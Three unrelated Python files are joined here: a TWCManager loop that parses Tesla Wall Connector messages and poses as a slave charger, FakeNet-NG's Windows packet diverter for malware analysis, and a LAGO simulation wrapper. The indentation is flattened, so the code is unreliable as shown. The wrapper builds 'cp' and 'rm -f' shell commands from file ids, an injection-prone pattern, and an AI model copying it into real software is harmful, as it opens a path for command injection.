# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
logger.info(
"WARNING: Slave TWC %02X%02X status data: "
"%s sent to unknown TWC %02X%02X."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
)
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
lifetimekWh = msgMatch.group(2)
kWh = (
(lifetimekWh[0] << 24)
+ (lifetimekWh[1] << 16)
+ (lifetimekWh[2] << 8)
+ lifetimekWh[3]
)
vPhaseA = msgMatch.group(3)
voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1]
vPhaseB = msgMatch.group(4)
voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1]
vPhaseC = msgMatch.group(5)
voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1]
data = msgMatch.group(6)
logger.info(
"Slave TWC %02X%02X: Delivered %d kWh, voltage per phase: (%d, %d, %d).",
senderID[0],
senderID[1],
kWh,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
extra={
"logtype": "slave_status",
"TWCID": senderID,
"kWh": kWh,
"voltsPerPhase": [voltsPhaseA, voltsPhaseB, voltsPhaseC],
},
)
                                # Update the timestamp of the last receipt of this message
master.lastkWhMessage = time.time()
# Every time we get this message, we re-queue the query
master.queue_background_task({"cmd": "getLifetimekWh"})
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
else:
msgMatch = re.search(
b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Get 7 characters of VIN from slave. (XE is first 7, XF second 7)
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code
# representing a letter or number. VV will be all zero when car CAN communication is disabled
# (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter.
foundMsgMatch = True
vinPart = msgMatch.group(1)
senderID = msgMatch.group(2)
data = msgMatch.group(3)
logger.log(
logging.INFO6,
"Slave TWC %02X%02X reported VIN data: %s."
% (senderID[0], senderID[1], hex_str(data)),
)
slaveTWC = master.getSlaveByID(senderID)
if vinPart == b"\xee":
vinPart = 0
if vinPart == b"\xef":
vinPart = 1
if vinPart == b"\xf1":
vinPart = 2
slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00")
if vinPart < 2:
vinPart += 1
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": senderID,
"vinPart": str(vinPart),
}
)
else:
potentialVIN = "".join(slaveTWC.VINData)
# Ensure we have a valid VIN
if len(potentialVIN) == 17:
# Record Vehicle VIN
slaveTWC.currentVIN = potentialVIN
# Clear VIN retry timer
slaveTWC.lastVINQuery = 0
slaveTWC.vinQueryAttempt = 0
# Record this vehicle being connected
master.recordVehicleVIN(slaveTWC)
# Send VIN data to Status modules
master.updateVINStatus()
# Establish if this VIN should be able to charge
# If not, send stop command
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"subTWC": slaveTWC,
}
)
vinPart += 1
else:
# Unfortunately the VIN was not the right length.
# Re-request VIN
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": slaveTWC.TWCID,
"vinPart": 0,
}
)
logger.log(
logging.INFO6,
"Current VIN string is: %s at part %d."
% (str(slaveTWC.VINData), vinPart),
)
else:
msgMatch = re.search(
b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
foundMsgMatch = True
logger.info(
"ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. "
"Search installation instruction PDF for 'rotary switch' and set "
"switch so its arrow points to F on the dial."
)
if foundMsgMatch == False:
logger.info(
"*** UNKNOWN MESSAGE FROM SLAVE:"
+ hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com "
"with a copy of this error."
)
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(
b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready1. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(
b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready2. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
else:
msgMatch = re.search(
b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
master.setMasterTWCID(senderID)
try:
slaveTWC = master.slaveTWCs[receiverID]
except KeyError:
slaveTWC = master.newSlave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if receiverID != fakeTWCID:
# This message was intended for another slave.
# Ignore it.
logger.log(
logging.DEBUG2,
"Master %02X%02X sent "
"heartbeat message %s to receiver %02X%02X "
"that isn't our fake slave."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
),
)
continue
amps = (
master.slaveHeartbeatData[1] << 8
) + master.slaveHeartbeatData[2]
master.addkWhDelivered(
(master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60)
* (now - timeLastkWhDelivered)
)
timeLastkWhDelivered = now
if time.time() - timeLastkWhSaved >= 300.0:
timeLastkWhSaved = now
logger.log(
logging.INFO9,
"Fake slave has delivered %.3fkWh"
% (master.getkWhDelivered()),
)
# Save settings to file
master.queue_background_task({"cmd": "saveSettings"})
if heartbeatData[0] == 0x07:
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
master.slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif heartbeatData[0] == 0x06:
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
master.slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[2] = amps & 0xFF
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif (
heartbeatData[0] == 0x05
or heartbeatData[0] == 0x08
or heartbeatData[0] == 0x09
):
if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0:
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
master.slaveHeartbeatData[1] = heartbeatData[1]
master.slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF
master.slaveHeartbeatData[4] = ampsUsed & 0xFF
elif heartbeatData[0] == 0:
if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now:
timeTo0Aafter06 = 0
master.slaveHeartbeatData[0] = 0x0A
elif timeToRaise2A > 0 and timeToRaise2A < now:
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
master.slaveHeartbeatData[0] = 0x0A
elif heartbeatData[0] == 0x02:
logger.info(
"Master heartbeat contains error %ld: %s"
% (heartbeatData[1], hex_str(heartbeatData))
)
else:
logger.info("UNKNOWN MHB state %s" % (hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(master.slaveHeartbeatData)
else:
msgMatch = re.search(
b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
logger.info("Received 2-hour idle message from Master.")
else:
msgMatch = re.search(
b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
master.newSlave(senderID, maxAmps)
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
try:
slaveTWC = master.slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = master.newSlave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(
b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage request message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.log(
logging.INFO8,
"VRQ from %02X%02X to %02X%02X"
% (senderID[0], senderID[1], receiverID[0], receiverID[1]),
)
if receiverID == fakeTWCID:
kWhCounter = int(master.getkWhDelivered())
kWhPacked = bytearray(
[
((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF),
]
)
logger.info(
"VRS %02X%02X: %dkWh (%s) %dV %dV %dV"
% (
fakeTWCID[0],
fakeTWCID[1],
kWhCounter,
hex_str(kWhPacked),
240,
0,
0,
)
)
master.getInterfaceModule().send(
bytearray(b"\xFD\xEB")
+ fakeTWCID
+ kWhPacked
+ bytearray(b"\x00\xF0\x00\x00\x00\x00\x00")
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (
(data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
)
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage response message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.info(
"VRS %02X%02X: %dkWh %dV %dV %dV"
% (
senderID[0],
senderID[1],
kWhCounter,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
)
)
if foundMsgMatch == False:
logger.info("***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
logger.info("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
logger.info("Unhandled Exception:" + traceback.format_exc())
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Make sure any volatile data is written to disk before exiting
master.queue_background_task({"cmd": "saveSettings"})
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
master.backgroundTasksQueue.join()
# Close the input module
master.getInterfaceModule().close()
#
# End main program
#
##############################
|
windows.py
|
# Diverter for Windows implemented using WinDivert library
import logging
from pydivert.windivert import *
import socket
import os
import dpkt
from . import fnpacket
import time
import threading
import platform
from winutil import *
from diverterbase import *
import subprocess
class WindowsPacketCtx(fnpacket.PacketCtx):
def __init__(self, lbl, wdpkt):
self.wdpkt = wdpkt
raw = wdpkt.raw.tobytes()
super(WindowsPacketCtx, self).__init__(lbl, raw)
# Packet mangling properties are extended here to also write the data to
# the pydivert.Packet object. This is because there appears to be no way to
# populate the pydivert.Packet object with plain octets unless you can also
# provide @interface and @direction arguments which do not appear at a
# glance to be directly available as attributes of pydivert.Packet,
# according to https://ffalcinelli.github.io/pydivert/
#
# Perhaps we can get these from wd_addr?
# src_ip overrides
@property
def src_ip(self):
return self._src_ip
@src_ip.setter
def src_ip(self, new_srcip):
super(self.__class__, self.__class__).src_ip.fset(self, new_srcip)
self.wdpkt.src_addr = new_srcip
# dst_ip overrides
@property
def dst_ip(self):
return self._dst_ip
@dst_ip.setter
def dst_ip(self, new_dstip):
super(self.__class__, self.__class__).dst_ip.fset(self, new_dstip)
self.wdpkt.dst_addr = new_dstip
# sport overrides
@property
def sport(self):
return self._sport
@sport.setter
def sport(self, new_sport):
super(self.__class__, self.__class__).sport.fset(self, new_sport)
if self.proto:
self.wdpkt.src_port = new_sport
# dport overrides
@property
def dport(self):
return self._dport
@dport.setter
def dport(self, new_dport):
super(self.__class__, self.__class__).dport.fset(self, new_dport)
if self.proto:
self.wdpkt.dst_port = new_dport
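# A quick illustration of the pattern above (hypothetical values): mutating the
# context also updates the wrapped pydivert packet, so it can be re-injected as-is.
#
#   pkt = WindowsPacketCtx('example', wdpkt)  # wdpkt obtained from handle.recv()
#   pkt.dst_ip = '192.0.2.1'                  # also sets wdpkt.dst_addr
#   handle.send(pkt.wdpkt)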
class Diverter(DiverterBase, WinUtilMixin):
def __init__(self, diverter_config, listeners_config, ip_addrs,
logging_level=logging.INFO):
# Populated by winutil and used to restore modified Interfaces back to
# DHCP
self.adapters_dhcp_restore = list()
self.adapters_dns_restore = list()
super(Diverter, self).__init__(diverter_config, listeners_config,
ip_addrs, logging_level)
self.running_on_windows = True
if not self.single_host_mode:
self.logger.critical('Windows diverter currently only supports '
'SingleHost mode')
sys.exit(1)
# Used (by winutil) for caching of DNS server names prior to changing
self.adapters_dns_server_backup = dict()
# Configure external and loopback IP addresses
self.external_ip = self.get_best_ipaddress()
if not self.external_ip:
self.external_ip = self.get_ip_with_gateway()
if not self.external_ip:
self.external_ip = socket.gethostbyname(socket.gethostname())
self.logger.debug('External IP: %s Loopback IP: %s' %
(self.external_ip, self.loopback_ip))
#######################################################################
# Initialize filter and WinDivert driver
# Interpose on all IP datagrams so they appear in the pcap, let
# DiverterBase decide whether they're actually forwarded etc.
self.filter = 'outbound and ip'
# Initialize WinDivert
try:
self.handle = WinDivert(filter=self.filter)
self.handle.open()
        except WindowsError as e:
if e.winerror == 5:
self.logger.critical('ERROR: Insufficient privileges to run '
'windows diverter.')
self.logger.critical(' Please restart with '
'Administrator privileges.')
sys.exit(1)
elif e.winerror == 3:
self.logger.critical('ERROR: Could not locate WinDivert DLL '
'or one of its components.')
self.logger.critical(' Please make sure you have copied '
'FakeNet-NG to the C: drive.')
sys.exit(1)
else:
self.logger.critical('ERROR: Failed to open a handle to the '
'WinDivert driver: %s', e)
sys.exit(1)
###########################################################################
# Diverter controller functions
def startCallback(self):
# Set local DNS server IP address
if self.is_set('modifylocaldns'):
self.set_dns_server(self.external_ip)
# Stop DNS service
if self.is_set('stopdnsservice'):
self.stop_service_helper('Dnscache')
self.logger.debug('Diverting ports: ')
self.flush_dns()
self.diverter_thread = threading.Thread(target=self.divert_thread)
self.diverter_thread.daemon = True
self.diverter_thread.start()
return True
def divert_thread(self):
try:
while True:
wdpkt = self.handle.recv()
if wdpkt is None:
self.logger.error('ERROR: Can\'t handle packet.')
continue
pkt = WindowsPacketCtx('divert_thread', wdpkt)
cb3 = [
self.check_log_icmp,
self.redirIcmpIpUnconditionally
]
cb4 = [
self.maybe_redir_port,
self.maybe_fixup_sport,
self.maybe_redir_ip,
self.maybe_fixup_srcip,
]
self.handle_pkt(pkt, cb3, cb4)
# Attempt to send the processed packet
self.setLastErrorNull() # WinDivert/LastError workaround
try:
self.handle.send(pkt.wdpkt)
                except Exception as e:
protocol = 'Unknown'
if pkt.proto:
protocol = pkt.proto
elif pkt.is_icmp:
protocol = 'ICMP'
self.logger.error('ERROR: Failed to send %s %s %s packet',
self.pktDirectionStr(pkt),
self.pktInterfaceStr(pkt), protocol)
self.logger.error(' %s' % (pkt.hdrToStr()))
self.logger.error(' %s', e)
except WindowsError as e:
if e.winerror in [4, 6, 995]:
return
else:
raise
def stopCallback(self):
if self.pcap:
self.pcap.close()
self.handle.close()
# Restore DHCP adapter settings
for interface_name in self.adapters_dhcp_restore:
cmd_set_dhcp = ('netsh interface ip set address name="%s" dhcp' %
interface_name)
# Restore DHCP on interface
try:
subprocess.check_call(cmd_set_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
            except subprocess.CalledProcessError as e:
self.logger.error('Failed to restore DHCP on interface %s.' %
interface_name)
else:
self.logger.info('Restored DHCP on interface %s' %
interface_name)
# Restore DHCP adapter settings
for interface_name in self.adapters_dns_restore:
cmd_del_dns = ('netsh interface ip delete dns name="%s" all' %
interface_name)
cmd_set_dns_dhcp = ('netsh interface ip set dns "%s" dhcp' %
interface_name)
# Restore DNS on interface
try:
subprocess.check_call(cmd_del_dns, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
subprocess.check_call(cmd_set_dns_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
            except subprocess.CalledProcessError as e:
self.logger.error("Failed to restore DNS on interface %s." %
interface_name)
else:
self.logger.info("Restored DNS on interface %s" %
interface_name)
# Restore DNS server
if self.is_set('modifylocaldns'):
self.restore_dns_server()
# Restart DNS service
if self.is_set('stopdnsservice'):
self.start_service_helper('Dnscache')
self.flush_dns()
return True
def pktInterfaceStr(self, pkt):
"""WinDivert provides is_loopback which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'loopback' if pkt.wdpkt.is_loopback else 'external'
def pktDirectionStr(self, pkt):
"""WinDivert provides is_inbound which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'inbound' if pkt.wdpkt.is_inbound else 'outbound'
def redirIcmpIpUnconditionally(self, crit, pkt):
"""Redirect ICMP to loopback or external IP if necessary.
On Windows, we can't conveniently use an iptables REDIRECT rule to get
ICMP packets sent back home for free, so here is some code.
"""
if (pkt.is_icmp and
pkt.dst_ip not in [self.loopback_ip, self.external_ip]):
self.logger.info('Modifying ICMP packet (type %d, code %d):' %
(pkt.icmp_type, pkt.icmp_code))
self.logger.info(' from: %s' % (pkt.hdrToStr()))
pkt.dst_ip = self.getNewDestinationIp(pkt.src_ip)
self.logger.info(' to: %s' % (pkt.hdrToStr()))
return pkt
def main():
diverter_config = {'redirectalltraffic': 'no',
'defaultlistener': 'DefaultListener',
'dumppackets': 'no'}
listeners_config = {'DefaultListener': {'port': '1337', 'protocol': 'TCP'}}
diverter = Diverter(diverter_config, listeners_config)
diverter.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
diverter.stop()
###########################################################################
# Run tests
# TODO
if __name__ == '__main__':
main()
|
ARTIwrapper.py
|
#
###############################################################################
# Original Author: A.J. Rubio-Montero (http://orcid.org/0000-0001-6497-753X), #
# CIEMAT - Sci-Track Group (http://rdgroups.ciemat.es/web/sci-track),#
# for the EOSC-Synergy project (EU H2020 RI Grant No 857647). #
# License (SPDX): BSD-3-Clause (https://opensource.org/licenses/BSD-3-Clause) #
# Copyright (c): 2020-today, The LAGO Collaboration (http://lagoproject.net) #
###############################################################################
# additional modules needed
# apt-get install python3-xattr
# or yum install -y python36-pyxattr
import os
import xattr
import json
import shutil
import time
from threading import Thread
from queue import Queue
# own functions
import osUtils
import mdUtils
class ARTIwrapper():
def __init__(self, get_sys_args, get_dataset_metadata, producer):
self._q = Queue()
self._q_onedata = Queue()
# passed functions
self._get_sys_args = get_sys_args
self._get_dataset_metadata = get_dataset_metadata
self._producer = producer
# ---- queued operations through OneClient -----------
def _consumer_onedata_cp(self, onedata_path):
while True:
md = self._q_onedata.get()
try:
id = json.loads(md)['@id']
                # oneclient changes the file owner when a file is moved into
                # onedata, and that makes shutil.move() raise exceptions:
                # shutil.move('.' + id, onedata_path + id)
                #
                # Copy the file only if it exists; if it does not, it is probably
                # because corsika failed to produce it.
if os.path.exists("." + id):
cmd = "cp ." + id + " " + onedata_path + id
osUtils.run_Popen(cmd)
time.sleep(0.1)
# test if effectively copied to copy metadata
if os.path.exists(onedata_path + id):
xattr.setxattr(onedata_path + id, 'onedata_json', md)
id_hidden = '/' + id.lstrip('/').replace('/','/.metadata/.')
osUtils._write_file(onedata_path + id_hidden + '.jsonld', md)
else:
print('CAUTION: '+ id +' is not in onedata, requeuing...' )
                        raise Exception('copy of ' + id + ' to onedata did not complete')
# thus, I can remove local file
cmd = "rm -f ." + id
osUtils.run_Popen(cmd)
else:
print('ERROR: '+ id +' was not calculated')
self._q_onedata.task_done()
except Exception as inst:
print(id + ': copy queued again')
self._q_onedata.put(md)
time.sleep(2)
                # q.put() increments the queue length, but we are only re-queueing
                # the same item, so call task_done() to keep the unfinished-task
                # count balanced.
self._q_onedata.task_done()
def _run_check_and_copy_results(self, catcodename, filecode, task, onedata_path,
arti_params_dict):
# check if the results are already in onedata before running the task
runtask = False
mdlist_prev = self._get_dataset_metadata(catcodename, filecode,
mdUtils.xsd_dateTime(), mdUtils.xsd_dateTime(),
arti_params_dict)
for md in mdlist_prev:
id = json.loads(md)['@id']
# We should also check if the existent metadata is well formed
f = onedata_path + id
# print("Check if exist: " + f)
if not os.path.exists(f):
print("This result does not exist in onedata: " + f)
print("Thus... I will RUN : " + filecode)
runtask = True
break
if not runtask:
print("Results already in OneData, none to do with RUN : " + filecode)
else:
try:
start_date = mdUtils.xsd_dateTime()
osUtils.run_Popen(task)
metadatalist = self._get_dataset_metadata(catcodename, filecode,
start_date, mdUtils.xsd_dateTime(),
arti_params_dict)
for md in metadatalist:
self._q_onedata.put(md)
except Exception as inst:
raise inst
# ---- END: queued operations through OneClient -----------
# ---- producer/consumer of executions ---------
# Introduced as param in init()
# function inputs: catcodename, arti_params
# output: Queue() with (filecode, task) elements
#def _producer(self, catcodename, arti_params):
# pass
def _consumer(self, catcodename, onedata_path, arti_params_dict):
while True:
(filecode, task) = self._q.get()
try:
self._run_check_and_copy_results(catcodename, filecode, task,
onedata_path, arti_params_dict)
print('Completed NRUN: ' + str(filecode) + ' ' + task)
self._q.task_done()
except Exception as inst:
self._q.put((filecode, task))
                # q.put() increments the queue length, but we are only re-queueing
                # the same item, so call task_done() to keep the unfinished-task
                # count balanced.
self._q.task_done()
# ---- END: producer/consumer of executions ---------
def _reconstruct_arti_args_from_dict(self, args_dict):
# reconstruct arguments to launch ARTI by command line
s = ''
for (key, value) in args_dict.items():
if value is not None:
s += ' -'+key
if value is not True:
s += ' '+str(value)
return s
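    # Example (illustrative values only): {'j': 4, 'v': '77402', 'x': True, 'u': None}
    # is reconstructed as ' -j 4 -v 77402 -x'; None entries are skipped and True adds
    # just the flag without a value.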
def _add_private_info_to_dict(self, args_dict):
# Now I can add extra info (without changing s)
#
# if 'v' is defined, is because CORSIKA is used
if 'v' in args_dict :
args_dict['priv_corsikacommit'] = mdUtils.get_git_commit('/opt/lago-corsika-' + args_dict['v'])
args_dict['priv_articommit'] = mdUtils.get_git_commit(os.environ['LAGO_ARTI'])
args_dict['priv_odsimcommit'] = mdUtils.get_git_commit(os.environ['LAGO_ONEDATASIM'])
# WARNING temporarily the main HANDLE ref will be the current OneProvider
handleaux='https://' + os.environ['ONECLIENT_PROVIDER_HOST']
args_dict['priv_handlejsonapi'] = handleaux + '/api/v3/oneprovider/metadata/json'
args_dict['priv_handlecdmi'] = handleaux + '/cdmi'
# dcat:accessURL corresponds to the landing page and it can only be set when the
# data will be officially published, thus temporarily we firstly use a dummy url
args_dict['priv_landingpage'] = 'https://datahub.egi.eu/not_published_yet'
return args_dict
# ---- MAIN PROGRAM ---------
def run(self):
main_start_date = mdUtils.xsd_dateTime()
(catcodename, arti_params_dict, arti_params_json_md) = self._get_sys_args()
arti_params = self._reconstruct_arti_args_from_dict(arti_params_dict)
arti_params_dict = self._add_private_info_to_dict(arti_params_dict)
# arti_params_dict = mdUtils.add_private_info_to_dict(arti_params_dict)
onedata_path = '/mnt/datahub.egi.eu/LAGOsim'
# onedata_path = '/mnt/datahub.egi.eu/test8/LAGOSIM'
catalog_path = onedata_path + '/' + catcodename
print(arti_params, arti_params_dict, arti_params_json_md)
try:
# mount OneData (fails in python although you wait forever):
# removed, currently in Dockerfile.
# cmd = "oneclient --force-proxy-io /mnt"
# osUtils.run_Popen(cmd, timeout=10)
if os.path.exists(onedata_path):
if not os.path.exists(catalog_path):
os.mkdir(catalog_path, mode=0o755) # this should change to 0700
os.mkdir(catalog_path + '/.metadata', mode=0o755) # idem to 0700
md = mdUtils.get_first_catalog_metadata_json(catcodename,
arti_params_dict)
md = mdUtils.add_json(md, arti_params_json_md)
# osUtils.write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
# json.dumps(md))
osUtils._write_file(catalog_path + '/.metadata/.' + catcodename + '.jsonld',
json.dumps(md))
xattr.setxattr(catalog_path, 'onedata_json', json.dumps(md))
else:
if not os.access(catalog_path, os.W_OK):
# It is needed managing this with some kind of versioning
# or completion of failed simulations
raise Exception("Simulation blocked by other user in" + \
" OneData: " + catalog_path)
else:
raise Exception("OneData not mounted")
except Exception as inst:
raise inst
for i in range(int(arti_params_dict["j"])): # processors
t = Thread(target=self._consumer, args=(catcodename, onedata_path,
arti_params_dict))
t.daemon = True
t.start()
q_aux = self._producer(catcodename, arti_params)
        for i in q_aux.queue:
            self._q.put(i)
t = Thread(target=self._consumer_onedata_cp, args=(onedata_path,))
t.daemon = True
t.start()
self._q.join()
self._q_onedata.join()
md = json.loads(xattr.getxattr(catalog_path, 'onedata_json'))
# I'm replacing, not adding datasets.
md['dataset'] = ["/" + catcodename + "/" + s for s in
os.listdir(catalog_path) if not s.startswith('.')]
